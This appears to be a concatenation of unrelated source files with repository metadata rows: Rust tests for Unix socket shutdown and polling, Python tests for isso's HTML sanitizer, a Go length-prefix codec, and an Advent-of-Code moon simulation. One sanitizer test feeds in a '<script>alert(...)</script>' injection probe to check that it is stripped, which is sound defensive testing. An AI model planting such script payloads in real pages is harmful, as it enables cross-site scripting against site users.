    let wrote = assert_ok!(s2.write(&DATA2));
    assert_eq!(wrote, DATA2_LEN);
    assert_ok!(s2.flush());

    let read = assert_ok!(s1.read(&mut buf));
    assert_eq!(read, DATA2_LEN);
    assert_eq!(&buf[..read], DATA2);
    assert_eq!(read, wrote, "unequal reads and writes");
}
// A clone obtained via `try_clone` shares the underlying socket: after
// deregistering and dropping the original, the clone can be registered and
// read back what the original wrote (echoed by the listener).
#[test]
fn unix_stream_try_clone() {
    let (mut poll, mut events) = init_with_poll();

    let (handle, remote_addr) = new_echo_listener(1);
    let path = remote_addr.as_pathname().expect("failed to get pathname");

    let mut stream_1 = assert_ok!(UnixStream::connect(path));
    assert_ok!(poll
        .registry()
        .register(&stream_1, TOKEN_1, Interests::WRITABLE));
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
    );

    let mut buf = [0; DEFAULT_BUF_SIZE];
    let wrote = assert_ok!(stream_1.write(&DATA1));
    assert_eq!(wrote, DATA1_LEN);

    let mut stream_2 = assert_ok!(stream_1.try_clone());

    // When using `try_clone` the `UnixStream` needs to be deregistered!
    assert_ok!(poll.registry().deregister(&stream_1));
    drop(stream_1);

    assert_ok!(poll
        .registry()
        .register(&stream_2, TOKEN_2, Interests::READABLE));
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_2, Interests::READABLE)],
    );

    let read = assert_ok!(stream_2.read(&mut buf));
    assert_eq!(read, DATA1_LEN);
    assert_eq!(&buf[..read], DATA1);

    // Close the connection to allow the remote to shutdown
    drop(stream_2);
    assert_ok!(handle.join());
}
// `peer_addr` must report the path we connected to; the unnamed client
// socket itself has no pathname.
#[test]
fn unix_stream_peer_addr() {
    let (handle, expected_addr) = new_echo_listener(1);
    let expected_path = expected_addr.as_pathname().expect("failed to get pathname");

    let stream = assert_ok!(UnixStream::connect(expected_path));

    assert_eq!(
        assert_ok!(stream.peer_addr()).as_pathname().unwrap(),
        expected_path
    );
    assert!(assert_ok!(stream.local_addr()).as_pathname().is_none());

    // Close the connection to allow the remote to shutdown
    drop(stream);
    assert_ok!(handle.join());
}
// Shutting down the read half must surface a read-closed readiness event.
#[test]
fn unix_stream_shutdown_read() {
    let (mut poll, mut events) = init_with_poll();

    let (handle, remote_addr) = new_echo_listener(1);
    let path = remote_addr.as_pathname().expect("failed to get pathname");

    let mut stream = assert_ok!(UnixStream::connect(path));
    assert_ok!(poll.registry().register(
        &stream,
        TOKEN_1,
        Interests::READABLE.add(Interests::WRITABLE)
    ));
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
    );

    // Write something so the echo listener sends data back.
    let wrote = assert_ok!(stream.write(DATA1));
    assert_eq!(wrote, DATA1_LEN);
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
    );

    assert_ok!(stream.shutdown(Shutdown::Read));
    expect_readiness!(poll, events, is_read_closed);

    // Shutting down the reading side is different on each platform. For example
    // on Linux based systems we can still read.
    #[cfg(any(
        target_os = "dragonfly",
        target_os = "freebsd",
        target_os = "ios",
        target_os = "macos",
        target_os = "netbsd",
        target_os = "openbsd"
    ))]
    {
        let mut buf = [0; DEFAULT_BUF_SIZE];
        let read = assert_ok!(stream.read(&mut buf));
        assert_eq!(read, 0);
    }

    // Close the connection to allow the remote to shutdown
    drop(stream);
    assert_ok!(handle.join());
}
// After shutting down the write half, writes must fail with `BrokenPipe`
// while already-buffered data can still be read back.
#[test]
fn unix_stream_shutdown_write() {
    let (mut poll, mut events) = init_with_poll();

    let (handle, remote_addr) = new_echo_listener(1);
    let path = remote_addr.as_pathname().expect("failed to get pathname");

    let mut stream = assert_ok!(UnixStream::connect(path));
    assert_ok!(poll.registry().register(
        &stream,
        TOKEN_1,
        Interests::WRITABLE.add(Interests::READABLE)
    ));
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
    );

    let wrote = assert_ok!(stream.write(DATA1));
    assert_eq!(wrote, DATA1_LEN);
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
    );

    assert_ok!(stream.shutdown(Shutdown::Write));

    // Only the BSD-style platforms report a write-closed event here.
    #[cfg(any(
        target_os = "dragonfly",
        target_os = "freebsd",
        target_os = "ios",
        target_os = "macos",
        target_os = "netbsd",
        target_os = "openbsd"
    ))]
    expect_readiness!(poll, events, is_write_closed);

    let err = assert_err!(stream.write(DATA2));
    assert_eq!(err.kind(), io::ErrorKind::BrokenPipe);

    // Read should be ok
    let mut buf = [0; DEFAULT_BUF_SIZE];
    let read = assert_ok!(stream.read(&mut buf));
    assert_eq!(read, DATA1_LEN);
    assert_eq!(&buf[..read], DATA1);

    // Close the connection to allow the remote to shutdown
    drop(stream);
    assert_ok!(handle.join());
}
// Shutting down both halves must surface a write-closed event; subsequent
// writes fail, and on BSD-style platforms reads return EOF.
#[test]
fn unix_stream_shutdown_both() {
    let (mut poll, mut events) = init_with_poll();

    let (handle, remote_addr) = new_echo_listener(1);
    let path = remote_addr.as_pathname().expect("failed to get pathname");

    let mut stream = assert_ok!(UnixStream::connect(path));
    assert_ok!(poll.registry().register(
        &stream,
        TOKEN_1,
        Interests::WRITABLE.add(Interests::READABLE)
    ));
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
    );

    let wrote = assert_ok!(stream.write(DATA1));
    assert_eq!(wrote, DATA1_LEN);
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
    );

    assert_ok!(stream.shutdown(Shutdown::Both));
    expect_readiness!(poll, events, is_write_closed);

    // Shutting down the reading side is different on each platform. For example
    // on Linux based systems we can still read.
    #[cfg(any(
        target_os = "dragonfly",
        target_os = "freebsd",
        target_os = "ios",
        target_os = "macos",
        target_os = "netbsd",
        target_os = "openbsd"
    ))]
    {
        let mut buf = [0; DEFAULT_BUF_SIZE];
        let read = assert_ok!(stream.read(&mut buf));
        assert_eq!(read, 0);
    }

    let err = assert_err!(stream.write(DATA2));
    #[cfg(unix)]
    assert_eq!(err.kind(), io::ErrorKind::BrokenPipe);
    // Fixed: was `#[cfg(window)]` (an always-false cfg name) and the
    // nonexistent variant `ConnectionAbroted`. Note this branch is dead
    // anyway because of the file-level `#![cfg(unix)]`.
    #[cfg(windows)]
    assert_eq!(err.kind(), io::ErrorKind::ConnectionAborted);

    // Close the connection to allow the remote to shutdown
    drop(stream);
    assert_ok!(handle.join());
}
// When the listener shuts down its write half, the client must observe a
// read-closed readiness event.
#[test]
fn unix_stream_shutdown_listener_write() {
    let barrier = Arc::new(Barrier::new(2));

    let (mut poll, mut events) = init_with_poll();

    let (handle, remote_addr) = new_noop_listener(1, barrier.clone());
    let path = remote_addr.as_pathname().expect("failed to get pathname");

    let stream = assert_ok!(UnixStream::connect(path));
    assert_ok!(poll.registry().register(
        &stream,
        TOKEN_1,
        Interests::READABLE.add(Interests::WRITABLE)
    ));
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
    );

    // First wait releases the listener so it performs `shutdown(Write)`.
    barrier.wait();
    expect_readiness!(poll, events, is_read_closed);

    // Second wait lets the listener drop the connection and finish.
    barrier.wait();
    assert_ok!(handle.join());
}
// Registering with only READABLE interest on an idle stream must not
// produce any events.
#[test]
fn unix_stream_register() {
    let (mut poll, mut events) = init_with_poll();

    let (handle, remote_addr) = new_echo_listener(1);
    let path = remote_addr.as_pathname().expect("failed to get pathname");

    let stream = assert_ok!(UnixStream::connect(path));
    assert_ok!(poll
        .registry()
        .register(&stream, TOKEN_1, Interests::READABLE));
    expect_no_events(&mut poll, &mut events);

    // Close the connection to allow the remote to shutdown
    drop(stream);
    assert_ok!(handle.join());
}
// Reregistering with WRITABLE interest must deliver the writable event
// that the initial READABLE-only registration could not.
#[test]
fn unix_stream_reregister() {
    let (mut poll, mut events) = init_with_poll();

    let (handle, remote_addr) = new_echo_listener(1);
    let path = remote_addr.as_pathname().expect("failed to get pathname");

    let stream = assert_ok!(UnixStream::connect(path));
    assert_ok!(poll
        .registry()
        .register(&stream, TOKEN_1, Interests::READABLE));
    assert_ok!(poll
        .registry()
        .reregister(&stream, TOKEN_1, Interests::WRITABLE));
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
    );

    // Close the connection to allow the remote to shutdown
    drop(stream);
    assert_ok!(handle.join());
}
// After deregistering, no events may be delivered for the stream.
#[test]
fn unix_stream_deregister() {
    let (mut poll, mut events) = init_with_poll();

    let (handle, remote_addr) = new_echo_listener(1);
    let path = remote_addr.as_pathname().expect("failed to get pathname");

    let stream = assert_ok!(UnixStream::connect(path));
    assert_ok!(poll
        .registry()
        .register(&stream, TOKEN_1, Interests::WRITABLE));
    assert_ok!(poll.registry().deregister(&stream));
    expect_no_events(&mut poll, &mut events);

    // Close the connection to allow the remote to shutdown
    drop(stream);
    assert_ok!(handle.join());
}
// Shared body for the smoke tests: connects a stream via `connect_stream`,
// then round-trips data through the echo listener using both the plain and
// the vectored read/write APIs.
fn smoke_test<F>(connect_stream: F)
where
    F: FnOnce(&Path) -> io::Result<UnixStream>,
{
    let (mut poll, mut events) = init_with_poll();

    let (handle, remote_addr) = new_echo_listener(1);
    let path = remote_addr.as_pathname().expect("failed to get pathname");

    let mut stream = assert_ok!(connect_stream(path));
    assert_ok!(poll.registry().register(
        &stream,
        TOKEN_1,
        Interests::WRITABLE.add(Interests::READABLE)
    ));
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
    );

    // Nothing has been echoed back yet, so reading must not block.
    let mut buf = [0; DEFAULT_BUF_SIZE];
    assert_would_block(stream.read(&mut buf));

    let wrote = assert_ok!(stream.write(&DATA1));
    assert_eq!(wrote, DATA1_LEN);
    assert_ok!(stream.flush());
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
    );

    let read = assert_ok!(stream.read(&mut buf));
    assert_eq!(read, DATA1_LEN);
    assert_eq!(&buf[..read], DATA1);
    assert_eq!(read, wrote, "unequal reads and writes");

    assert!(assert_ok!(stream.take_error()).is_none());

    // Same round-trip again, this time with the vectored I/O API.
    let bufs = [IoSlice::new(&DATA1), IoSlice::new(&DATA2)];
    let wrote = assert_ok!(stream.write_vectored(&bufs));
    assert_eq!(wrote, DATA1_LEN + DATA2_LEN);
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
    );

    let mut buf1 = [1; DATA1_LEN];
    let mut buf2 = [2; DATA2_LEN + 1];
    let mut bufs = [IoSliceMut::new(&mut buf1), IoSliceMut::new(&mut buf2)];
    let read = assert_ok!(stream.read_vectored(&mut bufs));
    assert_eq!(read, DATA1_LEN + DATA2_LEN);
    assert_eq!(&buf1, DATA1);
    assert_eq!(&buf2[..DATA2.len()], DATA2);
    // Last byte should be unchanged
    assert_eq!(buf2[DATA2.len()], 2);

    // Close the connection to allow the remote to shutdown
    drop(stream);
    assert_ok!(handle.join());
}
// Spawns a thread that binds a Unix listener in a temp dir and echoes back
// everything it reads, for `connections` connections. Returns the thread's
// join handle and the listener's address (received over a channel).
fn new_echo_listener(connections: usize) -> (thread::JoinHandle<()>, net::SocketAddr) {
    let (addr_sender, addr_receiver) = channel();
    let handle = thread::spawn(move || {
        let dir = assert_ok!(TempDir::new("unix"));
        let path = dir.path().join("any");
        let listener = assert_ok!(net::UnixListener::bind(path));
        let local_addr = assert_ok!(listener.local_addr());
        assert_ok!(addr_sender.send(local_addr));

        for _ in 0..connections {
            let (mut stream, _) = assert_ok!(listener.accept());

            // On Linux based system it will cause a connection reset
            // error when the reading side of the peer connection is
            // shutdown, we don't consider it an actual error here.
            let (mut read, mut written) = (0, 0);
            let mut buf = [0; DEFAULT_BUF_SIZE];
            loop {
                let n = match stream.try_read(&mut buf) {
                    Ok(Some(amount)) => {
                        read += amount;
                        amount
                    }
                    // `None` means WouldBlock: just retry.
                    Ok(None) => continue,
                    Err(ref err) if err.kind() == io::ErrorKind::ConnectionReset => break,
                    Err(err) => panic!("{}", err),
                };
                // A zero-byte read signals that the peer closed its side.
                if n == 0 {
                    break;
                }
                match stream.try_write(&buf[..n]) {
                    Ok(Some(amount)) => written += amount,
                    Ok(None) => continue,
                    Err(ref err) if err.kind() == io::ErrorKind::BrokenPipe => break,
                    Err(err) => panic!("{:?}", err),
                };
            }
            assert_eq!(read, written, "unequal reads and writes");
        }
    });
    (handle, assert_ok!(addr_receiver.recv()))
}
// Spawns a listener thread that, for each accepted connection, waits on the
// shared barrier, shuts down its write half, waits again, then drops the
// connection. Used to provoke read-closed events on the client side.
fn new_noop_listener(
    connections: usize,
    barrier: Arc<Barrier>,
) -> (thread::JoinHandle<()>, net::SocketAddr) {
    let (sender, receiver) = channel();
    let handle = thread::spawn(move || {
        let dir = assert_ok!(TempDir::new("unix"));
        let path = dir.path().join("any");
        let listener = assert_ok!(net::UnixListener::bind(path));
        let local_addr = assert_ok!(listener.local_addr());
        assert_ok!(sender.send(local_addr));

        for _ in 0..connections {
            let (stream, _) = assert_ok!(listener.accept());
            barrier.wait();
            assert_ok!(stream.shutdown(Shutdown::Write));
            barrier.wait();
            drop(stream);
        }
    });
    (handle, assert_ok!(receiver.recv()))
}
| 30.261947 | 98 | 0.612352 | 3.03125 |
f03d4c226a3b3aa190f45b9620b4a20bd1deafdc | 2,296 | py | Python | isso/tests/test_html.py | Nildeala/isso | 661f2a68813e6ba5c234c9b84f440681712cdcef | [
"MIT"
] | 1 | 2017-08-24T21:10:01.000Z | 2017-08-24T21:10:01.000Z | isso/tests/test_html.py | Nildeala/isso | 661f2a68813e6ba5c234c9b84f440681712cdcef | [
"MIT"
] | null | null | null | isso/tests/test_html.py | Nildeala/isso | 661f2a68813e6ba5c234c9b84f440681712cdcef | [
"MIT"
] | null | null | null |
try:
import unittest2 as unittest
except ImportError:
import unittest
from isso.core import Config
from isso.utils import html
class TestHTML(unittest.TestCase):
    """Tests for isso's markdown conversion and HTML sanitizing helpers."""

    def test_markdown(self):
        """Markdown conversion without any extensions enabled."""
        convert = html.Markdown(extensions=())
        cases = [
            ("*Ohai!*", "<p><em>Ohai!</em></p>"),
            ("<em>Hi</em>", "<p><em>Hi</em></p>"),
            ("http://example.org/", '<p>http://example.org/</p>')]

        for source, expected in cases:
            self.assertEqual(convert(source), expected)

    def test_markdown_extensions(self):
        """The strikethrough and superscript extensions are honoured."""
        convert = html.Markdown(extensions=("strikethrough", "superscript"))
        cases = [
            ("~~strike~~ through", "<p><del>strike</del> through</p>"),
            ("sup^(script)", "<p>sup<sup>script</sup></p>")]

        for source, expected in cases:
            self.assertEqual(convert(source), expected)

    @unittest.skipIf(html.html5lib_version == "0.95", "backport")
    def test_sanitizer(self):
        """With no elements/attributes whitelisted, markup is stripped."""
        sanitizer = html.Sanitizer(elements=[], attributes=[])
        cases = [
            ('Look: <img src="..." />', 'Look: '),
            ('<a href="http://example.org/">Ha</a>', '<a href="http://example.org/">Ha</a>'),
            ('<a href="sms:+1234567890">Ha</a>', '<a>Ha</a>'),
            ('<p style="visibility: hidden;">Test</p>', '<p>Test</p>'),
            ('<script>alert("Onoe")</script>', 'alert("Onoe")')]

        for source, expected in cases:
            self.assertEqual(html.sanitize(sanitizer, source), expected)

    @unittest.skipIf(html.html5lib_version == "0.95", "backport")
    def test_sanitizer_extensions(self):
        """Whitelisted elements and attributes survive sanitizing."""
        sanitizer = html.Sanitizer(elements=["img"], attributes=["src"])
        cases = [
            ('<img src="cat.gif" />', '<img src="cat.gif">'),
            ('<script src="doge.js"></script>', '')]

        for source, expected in cases:
            self.assertEqual(html.sanitize(sanitizer, source), expected)

    def test_render(self):
        """End-to-end rendering via html.Markup with the default config."""
        markup_conf = Config.load(None).section("markup")
        render = html.Markup(markup_conf).render

        rendered = render("http://example.org/ and sms:+1234567890")
        self.assertEqual(
            rendered,
            '<p><a href="http://example.org/">http://example.org/</a> and sms:+1234567890</p>')
| 37.639344 | 108 | 0.562718 | 3.09375 |
dd3594ddcffff304ad5bfce073709e244836ee0f | 1,591 | go | Go | codec/length_prefix.go | muirglacier/aw | 4245f85a37e6483f530da62354d27131d263334f | [
"MIT"
] | 36 | 2019-07-05T23:54:00.000Z | 2022-03-17T10:07:56.000Z | codec/length_prefix.go | muirglacier/aw | 4245f85a37e6483f530da62354d27131d263334f | [
"MIT"
] | 39 | 2019-07-29T07:15:06.000Z | 2021-08-03T05:02:13.000Z | codec/length_prefix.go | muirglacier/aw | 4245f85a37e6483f530da62354d27131d263334f | [
"MIT"
] | 8 | 2019-08-23T19:10:03.000Z | 2021-12-10T06:54:07.000Z | package codec
import (
"encoding/binary"
"fmt"
"io"
)
// LengthPrefixEncoder returns an Encoder that writes a big-endian uint32
// length prefix before the data itself. The prefix is written with
// prefixEnc, the payload with bodyEnc; the returned byte count covers the
// payload only.
func LengthPrefixEncoder(prefixEnc Encoder, bodyEnc Encoder) Encoder {
	return func(w io.Writer, buf []byte) (int, error) {
		// Serialise the payload length into a 4-byte big-endian prefix.
		var lengthBuf [4]byte
		binary.BigEndian.PutUint32(lengthBuf[:], uint32(len(buf)))
		if _, err := prefixEnc(w, lengthBuf[:]); err != nil {
			return 0, fmt.Errorf("encoding data length: %w", err)
		}
		n, err := bodyEnc(w, buf)
		if err != nil {
			return n, fmt.Errorf("encoding data: %w", err)
		}
		return n, nil
	}
}
// LengthPrefixDecoder returns a Decoder for data written by a
// LengthPrefixEncoder: it first decodes a big-endian uint32 length prefix
// with prefixDec, then decodes exactly that many payload bytes with bodyDec.
// It fails if the announced length exceeds the capacity of buf.
func LengthPrefixDecoder(prefixDec Decoder, bodyDec Decoder) Decoder {
	return func(r io.Reader, buf []byte) (int, error) {
		var lengthBuf [4]byte
		if _, err := prefixDec(r, lengthBuf[:]); err != nil {
			return 0, fmt.Errorf("decoding data length: %w", err)
		}
		bodyLen := binary.BigEndian.Uint32(lengthBuf[:])
		// The caller's buffer must be able to hold the announced payload.
		if bodyLen > uint32(len(buf)) {
			return 0, fmt.Errorf("decoding data length: expected %v, got %v", len(buf), bodyLen)
		}
		n, err := bodyDec(r, buf[:bodyLen])
		if err != nil {
			return n, fmt.Errorf("decoding data: %w", err)
		}
		return n, nil
	}
}
| 32.469388 | 86 | 0.68259 | 3.234375 |
d942e7026d94c61f6fe7ac42764aeadfcf3bd1fe | 3,645 | rs | Rust | src/components/launcher.rs | ericrasmussen/quatronaut2020 | fecb38274526b0fe33c95e2701a5d8bd72b3bba8 | [
"MIT"
] | 1 | 2021-04-17T20:33:33.000Z | 2021-04-17T20:33:33.000Z | src/components/launcher.rs | ericrasmussen/benitron3000 | fecb38274526b0fe33c95e2701a5d8bd72b3bba8 | [
"MIT"
] | 52 | 2020-10-14T06:38:00.000Z | 2022-03-21T00:16:44.000Z | src/components/launcher.rs | ericrasmussen/benitron3000 | fecb38274526b0fe33c95e2701a5d8bd72b3bba8 | [
"MIT"
] | 1 | 2020-10-02T16:54:13.000Z | 2020-10-02T16:54:13.000Z | //! This component tracks when and how to fire projectiles,
//! along with logic to create different projectiles.
use amethyst::{
assets::PrefabData,
core::Transform,
derive::PrefabData,
ecs::prelude::{Component, DenseVecStorage, Entities, Entity, LazyUpdate, NullStorage, ReadExpect, WriteStorage},
renderer::{sprite::SpriteSheetHandle, SpriteRender},
Error,
};
use rand::{thread_rng, Rng};
use serde::{Deserialize, Serialize};
use crate::components::{
collider::Collider,
movement::{Movement, MovementType},
tags::CleanupTag,
};
use crate::resources::audio::SoundType;
/// This is used by the boss enemy that fires projectiles. The
/// launcher lets us control the firing rate and projectile speed.
#[derive(Clone, Copy, Debug, Deserialize, Serialize, PrefabData)]
#[prefab(Component)]
#[serde(deny_unknown_fields)]
pub struct Launcher {
    /// Minimum number of seconds between shots (compared in `can_fire`).
    pub fire_delay: f32,
    /// Speed handed to the `Movement` component of spawned projectiles.
    pub projectile_speed: f32,
    /// Time accumulated since the last shot; reset by `can_fire`.
    pub seconds_since_firing: f32,
}
impl Launcher {
    /// Reports whether enough time has elapsed since the last shot.
    ///
    /// When it returns `true` the internal timer is reset to a small random
    /// value (rather than zero) so that several enemies firing on the same
    /// schedule drift apart instead of shooting in lock-step. When it
    /// returns `false` the elapsed `time` is accumulated. Resetting inside
    /// this method means callers never have to manage the timer themselves.
    pub fn can_fire(&mut self, time: f32) -> bool {
        if self.seconds_since_firing < self.fire_delay {
            self.seconds_since_firing += time;
            return false;
        }
        // Randomize the starting point of the next delay to stagger shots.
        self.seconds_since_firing = thread_rng().gen_range(0.1 .. 0.9);
        true
    }
}
// ECS storage registration for `Launcher` components.
impl Component for Launcher {
    type Storage = DenseVecStorage<Self>;
}
/// Empty struct that lets us tag entities as `Projectile`s. The `systems`
/// module needs this for looking them up.
#[derive(Debug, Default)]
pub struct Projectile;

// Marker components carry no data, so `NullStorage` is used.
impl Component for Projectile {
    type Storage = NullStorage<Self>;
}
/// This needs to be run by a system that has a launcher, sprites, transforms,
/// and all entities. It creates an entity with all the necessary components
/// for systems to operate on the projectile (moving it, detecting collisions,
/// checking if it's out of bounds, etc).
pub fn launch_projectile(
    launcher: Launcher,
    sprite_sheet_handle: SpriteSheetHandle,
    base_transform: &Transform,
    entities: &Entities,
    lazy_update: &ReadExpect<LazyUpdate>,
) {
    // NOTE (from the original author): an incorrect sprite number here
    // will lead to a memory leak.
    let render = SpriteRender {
        sprite_sheet: sprite_sheet_handle,
        sprite_number: 3,
    };

    // Spawn at the launcher's current location.
    let spawn_transform = base_transform.clone();

    // Projectiles rush straight ahead at the launcher's configured speed.
    let movement = Movement {
        speed: launcher.projectile_speed,
        velocity_x: 0.0,
        velocity_y: 0.0,
        freeze_direction: false,
        locked_direction: None,
        already_rotated: false,
        launch_sound: Some(SoundType::EnemyBlaster),
        movement_type: MovementType::ProjectileRush,
    };

    let hit_box = Collider {
        half_width: 16.0,
        half_height: 16.0,
    };

    // Queue component insertion through LazyUpdate; the ECS applies the
    // queued insertions later, outside this system's borrow.
    let spawned: Entity = entities.create();
    lazy_update.insert(spawned, Projectile {});
    lazy_update.insert(spawned, CleanupTag {});
    lazy_update.insert(spawned, movement);
    lazy_update.insert(spawned, spawn_transform);
    lazy_update.insert(spawned, hit_box);
    lazy_update.insert(spawned, render);
}
| 31.973684 | 116 | 0.687791 | 3.015625 |
ada541d03d501f3f49006046587dfaeaa1e3f73b | 7,100 | rs | Rust | task12_1/src/main.rs | HaronK/aoc2019 | 958c0a8fa125fbdc463115a78966fd31b3da7efb | [
"MIT"
] | 1 | 2019-12-12T13:11:51.000Z | 2019-12-12T13:11:51.000Z | task12_1/src/main.rs | HaronK/aoc2019 | 958c0a8fa125fbdc463115a78966fd31b3da7efb | [
"MIT"
] | null | null | null | task12_1/src/main.rs | HaronK/aoc2019 | 958c0a8fa125fbdc463115a78966fd31b3da7efb | [
"MIT"
] | null | null | null | use anyhow::Result;
use std::fmt;
use std::fs::File;
use std::io::prelude::*;
use std::ops::*;
// use termion;
/// Reads the puzzle input, then reports the system's full repeat period
/// and the total energy after 1000 simulation steps.
fn main() -> Result<()> {
    let mut content = String::new();
    let mut file = File::open("input.txt")?;
    file.read_to_string(&mut content)?;

    // Measure the full-turn period first.
    let mut moons = parse(&content)?;
    let period = get_full_turn_period(&mut moons);

    // Re-parse so the energy simulation starts from the *initial*
    // configuration rather than from wherever the period search left
    // the moons. (The unit tests below run the two checks the same
    // way, re-parsing between them.)
    let mut moons = parse(&content)?;
    let total = total_energy(1000, &mut moons);

    println!("Moons:");
    dump_moons(&moons);
    println!("Period: {}", period);
    println!("Total energy: {}", total);

    Ok(())
}
/// Prints each moon's position and velocity, one per line, indented.
fn dump_moons(moons: &[Moon]) {
    for moon in moons {
        println!("    {}", moon);
    }
}
/// Advances the simulation by `steps` ticks, then returns the sum of
/// every moon's total energy (potential * kinetic).
fn total_energy(steps: usize, moons: &mut Vec<Moon>) -> usize {
    for _step in 0..steps {
        process_once(moons);
    }
    moons.iter().map(|moon| moon.energy()).sum()
}
/// Simulates until each axis (x, y, z) independently returns to its
/// starting positions, then combines the three per-axis periods with an
/// LCM to obtain the full system period.
fn get_full_turn_period(moons: &mut Vec<Moon>) -> usize {
    // Number of simulation steps taken so far.
    let mut period: usize = 0;
    // Step count at which each axis first matched the initial state
    // again (0 = not found yet); indexed x, y, z.
    let mut moons_period = vec![0; 3];
    // Snapshot of the initial state to compare against.
    let orig = moons.clone();
    loop {
        period += 1;
        process_once(moons);
        if moons_period[0] == 0 && moons.iter().enumerate().all(|(i, m)| m.cmp_x(&orig[i])) {
            moons_period[0] = period;
        }
        if moons_period[1] == 0 && moons.iter().enumerate().all(|(i, m)| m.cmp_y(&orig[i])) {
            moons_period[1] = period;
        }
        if moons_period[2] == 0 && moons.iter().enumerate().all(|(i, m)| m.cmp_z(&orig[i])) {
            moons_period[2] = period;
        }
        // println!("{}Step: {} Periods: {:?}", termion::cursor::Goto(1, 1), period, moons_period);
        // std::io::stdout().flush().unwrap();
        // Stop once all three axes have a recorded period.
        if moons_period.iter().all(|&p| p != 0) {
            break;
        }
    }
    // NOTE(review): the comparisons above look only at positions
    // (cmp_x/y/z ignore velocity), and each recorded count gets +1
    // before the LCM. This matches the expected values in the unit
    // tests below, but confirm the off-by-one reasoning before
    // refactoring this arithmetic.
    let lcm1 = lcm(moons_period[0] + 1, moons_period[1] + 1);
    lcm(lcm1, moons_period[2] + 1)
}
/// Runs one simulation tick: applies gravity between every unordered
/// pair of moons, then moves each moon by its updated velocity.
fn process_once(moons: &mut Vec<Moon>) {
    let count = moons.len();
    for split in 1..count {
        // Borrow the moon at `split - 1` mutably alongside all the
        // moons after it, which is what split_at_mut makes legal.
        let (head, tail) = moons.split_at_mut(split);
        let current = head.last_mut().unwrap();
        for partner in tail.iter_mut() {
            current.update_vel(partner);
        }
        // Every pair involving `current` has now been processed, so its
        // velocity is final for this tick and can be applied.
        current.apply_vel();
    }
    moons[count - 1].apply_vel();
}
/// Least common multiple via the identity `lcm(a, b) = a / gcd(a, b) * b`.
/// Dividing before multiplying keeps the intermediate value small and is
/// exact, since `gcd(v1, v2)` always divides `v1`.
fn lcm(v1: usize, v2: usize) -> usize {
    v1 / gcd(v1, v2) * v2
}

/// Greatest common divisor (iterative Euclidean algorithm).
fn gcd(mut v1: usize, mut v2: usize) -> usize {
    while v1 != 0 {
        let old_v1 = v1;
        v1 = v2 % v1;
        v2 = old_v1;
    }
    v2
}
/// Signed scalar type used for all positions and velocities.
type CoordinateType = i64;

/// A point (or vector) in 3-D space.
#[derive(Clone, Default, PartialEq)]
struct Node3D {
    x: CoordinateType,
    y: CoordinateType,
    z: CoordinateType,
}

impl Node3D {
    /// Creates a node from its three components.
    fn new(x: CoordinateType, y: CoordinateType, z: CoordinateType) -> Self {
        Self { x, y, z }
    }
}

impl AddAssign for Node3D {
    /// Component-wise in-place addition.
    fn add_assign(&mut self, other: Self) {
        self.x += other.x;
        self.y += other.y;
        self.z += other.z;
    }
}

impl Neg for Node3D {
    type Output = Node3D;

    /// Component-wise negation.
    fn neg(self) -> Self::Output {
        Self {
            x: -self.x,
            y: -self.y,
            z: -self.z,
        }
    }
}

impl fmt::Display for Node3D {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        write!(f, "<{}, {}, {}>", self.x, self.y, self.z)
    }
}

/// One simulated body: a position and the velocity currently applied to it.
#[derive(Clone, PartialEq)]
struct Moon {
    pos: Node3D,
    vel: Node3D,
}

impl Moon {
    /// Creates a moon at the given position with zero velocity.
    fn new(x: CoordinateType, y: CoordinateType, z: CoordinateType) -> Self {
        Self {
            pos: Node3D::new(x, y, z),
            vel: Node3D::default(),
        }
    }

    /// Applies gravity between `self` and `other`: along each axis both
    /// velocities are pulled one unit toward each other, and left alone
    /// when the coordinates are equal.
    fn update_vel(&mut self, other: &mut Moon) {
        // signum(b - a) is +1, -1, or 0 -- exactly the per-axis pull
        // the original three-way comparison computed.
        let pull = |a: CoordinateType, b: CoordinateType| (b - a).signum();

        let dx = pull(self.pos.x, other.pos.x);
        self.vel.x += dx;
        other.vel.x -= dx;

        let dy = pull(self.pos.y, other.pos.y);
        self.vel.y += dy;
        other.vel.y -= dy;

        let dz = pull(self.pos.z, other.pos.z);
        self.vel.z += dz;
        other.vel.z -= dz;
    }

    /// Moves the moon by its current velocity.
    fn apply_vel(&mut self) {
        self.pos += self.vel.clone();
    }

    /// Potential energy: sum of the absolute position components.
    fn potential(&self) -> usize {
        (self.pos.x.abs() + self.pos.y.abs() + self.pos.z.abs()) as usize
    }

    /// Kinetic energy: sum of the absolute velocity components.
    fn kinetic(&self) -> usize {
        (self.vel.x.abs() + self.vel.y.abs() + self.vel.z.abs()) as usize
    }

    /// Total energy: potential times kinetic.
    fn energy(&self) -> usize {
        self.potential() * self.kinetic()
    }

    /// True when both moons share the same x position.
    fn cmp_x(&self, other: &Moon) -> bool {
        self.pos.x == other.pos.x
    }

    /// True when both moons share the same y position.
    fn cmp_y(&self, other: &Moon) -> bool {
        self.pos.y == other.pos.y
    }

    /// True when both moons share the same z position.
    fn cmp_z(&self, other: &Moon) -> bool {
        self.pos.z == other.pos.z
    }
}

impl fmt::Display for Moon {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        write!(f, "pos={}, vel={}", self.pos, self.vel)
    }
}
